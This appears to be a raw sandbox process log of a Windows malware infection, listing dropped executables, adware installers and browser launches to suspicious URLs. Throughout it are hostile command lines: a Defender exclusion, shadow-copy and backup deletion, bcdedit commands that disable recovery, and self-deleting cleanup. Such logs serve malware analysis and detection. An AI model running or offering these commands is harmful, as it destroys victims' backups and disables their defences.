"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629403837 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq&cid=74449¶m=721
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa20f146f8,0x7ffa20f14708,0x7ffa20f14718
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 732 -p 2008 -ip 2008
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2008 -s 2428
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
C:\Users\Admin\AppData\Local\Temp\6421.exe
C:\Users\Admin\AppData\Local\Temp\6421.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2196 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2764 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3088 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3100 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5100 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5108 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5380 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\58a98ba8-33df-4ad9-b88a-d39d0b71d632\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\58a98ba8-33df-4ad9-b88a-d39d0b71d632\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\58a98ba8-33df-4ad9-b88a-d39d0b71d632\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
C:\Users\Admin\AppData\Local\Temp\B7A1.exe
C:\Users\Admin\AppData\Local\Temp\B7A1.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\58a98ba8-33df-4ad9-b88a-d39d0b71d632\test.bat"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3088 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
C:\Users\Admin\AppData\Local\Temp\C3F6.exe
C:\Users\Admin\AppData\Local\Temp\C3F6.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa20f146f8,0x7ffa20f14708,0x7ffa20f14718
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3576 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\CCE1.exe
C:\Users\Admin\AppData\Local\Temp\CCE1.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5820 /prefetch:1
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5900 /prefetch:8
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
C:\Users\Admin\AppData\Local\Temp\6421.exe
C:\Users\Admin\AppData\Local\Temp\6421.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\6421.exe" -Force
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5900 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5716 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\F1FE.exe
C:\Users\Admin\AppData\Local\Temp\F1FE.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6396 /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 2680 -ip 2680
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2680 -s 292
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 8108 -ip 8108
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\csrss.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\csrss.exe" -start
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8108 -s 876
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rsjdqsdl.om4\GcleanerEU.exe /eufive & exit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\rsjdqsdl.om4\GcleanerEU.exe
C:\Users\Admin\AppData\Local\Temp\rsjdqsdl.om4\GcleanerEU.exe /eufive
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im MSBuild.exe /f & timeout /t 6 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" & del C:\ProgramData\*.dll & exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1s23tdqz.kf1\installer.exe /qn CAMPAIGN="654" & exit
C:\Users\Admin\AppData\Local\Temp\1s23tdqz.kf1\installer.exe
C:\Users\Admin\AppData\Local\Temp\1s23tdqz.kf1\installer.exe /qn CAMPAIGN="654"
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 1544 -ip 1544
C:\Windows\SysWOW64\taskkill.exe
taskkill /im MSBuild.exe /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\drwjbzx4.rcm\ufgaa.exe & exit
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1544 -s 296
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\SysWOW64\timeout.exe
timeout /t 6
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 8F0D675169118B68B9501C7E97A33C40 C
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\csrss.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\csrss.exe" -agent 0
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\l2gkxalb.x5m\anyname.exe & exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\j1bqu4qh.gyv\gcleaner.exe /mixfive & exit
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\1s23tdqz.kf1\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\1s23tdqz.kf1\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629403836 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\l2gkxalb.x5m\anyname.exe
C:\Users\Admin\AppData\Local\Temp\l2gkxalb.x5m\anyname.exe
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\j1bqu4qh.gyv\gcleaner.exe
C:\Users\Admin\AppData\Local\Temp\j1bqu4qh.gyv\gcleaner.exe /mixfive
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Users\Admin\AppData\Local\Temp\l2gkxalb.x5m\anyname.exe
"C:\Users\Admin\AppData\Local\Temp\l2gkxalb.x5m\anyname.exe" -q
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 712 -p 7144 -ip 7144
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7144 -s 292
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 5776 -ip 5776
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5776 -s 460
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1680 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
MaskVPNUpdate.exe /silent
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dq5n5a33.3ba\autosubplayer.exe /S & exit
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
C:\Windows\SysWOW64\notepad.exe
notepad.exe
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_18AC.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ffa1c28dec0,0x7ffa1c28ded0,0x7ffa1c28dee0
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ff655529e70,0x7ff655529e80,0x7ff655529e90
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1580,481587518537795703,4740324273599934189,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4292_1281950882" --mojo-platform-channel-handle=2116 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
